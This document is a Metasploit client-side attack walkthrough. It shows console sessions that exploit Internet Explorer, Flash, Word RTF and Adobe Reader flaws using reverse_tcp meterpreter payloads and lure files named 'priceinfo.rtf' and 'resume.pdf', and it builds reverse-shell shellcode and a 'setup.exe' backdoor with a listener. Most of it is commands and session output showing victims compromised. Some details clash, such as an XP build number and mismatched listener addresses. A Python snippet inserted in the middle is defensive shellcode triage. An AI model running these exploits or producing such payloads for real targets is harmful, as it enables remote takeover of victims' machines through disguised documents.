execCommand Use-After-Free vulnerability in Internet Explorer

msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit (ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload => windows/meterpreter/reverse_tcp
msf exploit (ie_execcommand_uaf) > show options

Module options (exploit/windows/browser/ie_execcommand_uaf):

    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    SRVHOST    0.0.0.0          yes       The local host to listen on.
    SRVPORT                     yes       The local port to listen on.
    SSL        false            no        Negotiate SSL for incoming connection.
    SSLCert                     no        Path to custom SSL Certificate.
    SSLVersion SSL3             no        Specify the version of SSL.
    URIPATH                     no        The URI to use for this exploit.

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique : seh, thread, process, none
LHOST                      yes       The listen address. 
LPORT     4444             yes       The listen port.

Exploit Target:
Id  Name
--  ----
0   Automatic

msf exploit (ie_execcommand_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit (ie_execcommand_uaf) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf exploit (ie_execcommand_uaf) > set URIPATH /
URIPATH => /
msf exploit (ie_execcommand_uaf) > exploit
[*] exploit running as background job
[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL : http://192.168.1.101:80/
[*] Server started
msf exploit (ie_execcommand_uaf) > [*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 192.168.1.101 ie_execcommand_uaf - Redirecting to page.html
[*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 192.168.1.101 ie_execcommand_uaf - Loading page.html
[*] 192.168.1.101 ie_execcommand_uaf - Using JRE ROP
[*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 192.168.1.101 ie_execcommand_uaf - Redirecting to page.html
[*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 192.168.1.101 ie_execcommand_uaf - Loading page.html
[*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 192.168.1.101 ie_execcommand_uaf - Redirecting to page.html
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 => 192.168.1.100:63670) at 2012-05-09 18:24:44
[*] Session ID 1 (192.168.1.101:4444 => 192.168.1.100:63670) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (5476)
[*] Spawning notepad.exe process to migrate to 
[*] Migrating to 4768
[*] Successfully migrated to process
msf exploit (ie_execcommand_uaf) > sessions -l
msf exploit (ie_execcommand_uaf) > sessions -i 1
[*] Starting interaction with 1
meterpreter > sysinfo
Computer : TRACEWIN
OS : Windows XP (Build 6000, Service Pack 3)
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

=========================================================================

Adobe Flash Player "newfunction" invalid pointer use vulnerability

msf  > use exploit/windows/fileformat/adobe_flashplayer_newfunction
msf  exploit (adobe_flashplayer_newfunction) > set PAYLOAD windows/meterpreter/reverse_tcp 
msf  exploit (adobe_flashplayer_newfunction) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf  exploit (adobe_flashplayer_newfunction) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf  exploit (adobe_flashplayer_newfunction) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL: http://192.168.1.101:8080/filename
[*] Server started.
msf  exploit (adobe_flashplayer_newfunction) >
[*] Sending crafted PDF/SWF to 192.168.1.100:1039
[*] Sending stage (748032 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:1040)
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.101:1040) processing InitialAutoRunScript 'migrate -f'
[*] Current server process : firefox.exe (3644)
[*] Spawning a notepad.exe host process
[*] Migrating into process ID 3900
[*] New server process: notepad.exe (3900)

msf  exploit (adobe_flashplayer_newfunction) > sessions  -l
Active sessions
  Id  Type         Information     Connection
  --  ----         -----------     ----------
  1   meterpreter  ERIC-FD2123B3C  192.168.1.100:1040
msf  exploit (adobe_flashplayer_newfunction) > sessions -i 1
meterpreter >
============================================================================

Microsoft Word RTF stack buffer overflow

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 

msf  exploit(ms10_087_rtf_pfragments_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh..
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME priceinfo.rtf
FILENAME => priceinfo.rtf

msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.56.101

[*] Creating 'priceinfo.rtf' file ...

[+] priceinfo.rtf stored at /root/.msf4/local/priceinfo.rtf
[*] Sending stage (752128 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:57031) at 2011-11-13 23:16:20 +0530

[*] Session ID 2 (192.168.56.101:4444 -> 192.168.56.1:57031) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: WINWORD.EXE (5820)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 5556
[+] Successfully migrated to process
==============================================================

Memory corruption in Adobe Reader U3D handling

msf > use exploit/windows/adobe_reader_u3d
msf exploit (adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit (adobe_reader_u3d) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit (adobe_reader_u3d) > set FILENAME resume.pdf
FILENAME => resume.pdf
msf exploit (adobe_reader_u3d) > exploit
[*] Creating resume.pdf file
[+] resume.pdf stored at /root/.msf4/local/resume.pdf

Now we need to create a listener to handle the reverse connection when the malicious file is executed on the victim's machine. Let's see how it is done in the next few steps.
msf exploit (adobe_reader_u3d) > use exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit (handler) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.101:1074)

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows XP (Build 2600, Service Pack 2)
meterpreter > shell
Process 256 created.
Channel 1 created.
Microsoft Windows XP (Version 5.1.2600)
C:\Documents and Settings\John\Desktop>
====================================================================

Generating a binary and shellcode with msfpayload

root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 O
So we have set LHOST and LPORT to suit our needs. The next step is to generate C code for our customized shell (the displayed output has been shortened to fit).
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 C

/*
 * windows/shell/reverse_tcp - 290 bytes (stage 1)
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.56.101, LPORT=4441, 
 * ReverseConnectRetries=5, EXITFUNC=process, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
Notice the capital C parameter on the command line. The output is the complete shellcode as a C array, which we can use in our own exploit development code. Alternatively, we can also generate the code in Ruby or Perl.
Let us proceed to the next step of generating a binary executable for the shellcode, which can be used in our client-side attack.
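As an added example (not code from the page or from Metasploit), the following Python triages a C listing of this shape from the analyst's side: it recovers the raw bytes from the escaped string literals, checks them against the length the header declares, hashes them, and flags the x86 Metasploit stager prologue that a detection rule for this shellcode family keys on. The sample input is constructed from the truncated listing above.

```python
"""Triage a shellcode listing exported by msfpayload in C format (added example,
not from the page or Metasploit): recover the raw bytes from the escaped string
literals, check them against the declared length, hash them, and flag the x86
Metasploit stager prologue that reads the PEB through fs:[0x30]."""
import hashlib
import re

# Constructed sample: the first two lines of the listing above, truncated the
# same way the page's listing is, so the length check is expected to fail.
SAMPLE_C = r'''
/*
 * windows/shell/reverse_tcp - 290 bytes (stage 1)
 * VERBOSE=false, LHOST=192.168.56.101, LPORT=4441,
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff";
'''

# cld; call rel32 (displacement wildcarded); pushad; mov ebp,esp; xor edx,edx;
# mov edx, fs:[edx+0x30] -> the block_api stager's first access to the PEB.
PEB_PROLOGUE = re.compile(rb"\xfc\xe8.{4}\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30", re.DOTALL)

def extract_bytes(c_source: str) -> bytes:
    """Join every adjacent hex-escaped string literal and decode the escapes."""
    literals = re.findall(r'"((?:\\x[0-9a-fA-F]{2})+)"', c_source)
    return b"".join(bytes.fromhex(lit.replace("\\x", "")) for lit in literals)

def declared_header(c_source: str) -> tuple:
    """Payload name and byte count from the ' * <name> - <n> bytes' header line."""
    m = re.search(r"\*\s*(\S+)\s+-\s+(\d+)\s+bytes", c_source)
    return (m.group(1), int(m.group(2))) if m else (None, None)

def triage(c_source: str) -> dict:
    data = extract_bytes(c_source)
    name, declared = declared_header(c_source)
    return {
        "payload": name,
        "declared_len": declared,
        "actual_len": len(data),
        # Fewer bytes than the header claims: the listing was cut or tampered with.
        "truncated": declared is not None and len(data) < declared,
        "peb_prologue": PEB_PROLOGUE.search(data) is not None,
        "sha256": hashlib.sha256(data).hexdigest(),
    }

if __name__ == "__main__":
    print(triage(SAMPLE_C))
```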
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 X > .local/setup.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.56.101"}

Now that our executable is ready, we have to set up a listener in msfconsole to wait for the back connection when the target executes this exe file.
msf > use multi/handler

msf  exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

msf  exploit(handler) > set LHOST 192.168.46.101

msf  exploit(handler) > exploit

[-] Handler failed to bind to 192.168.46.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler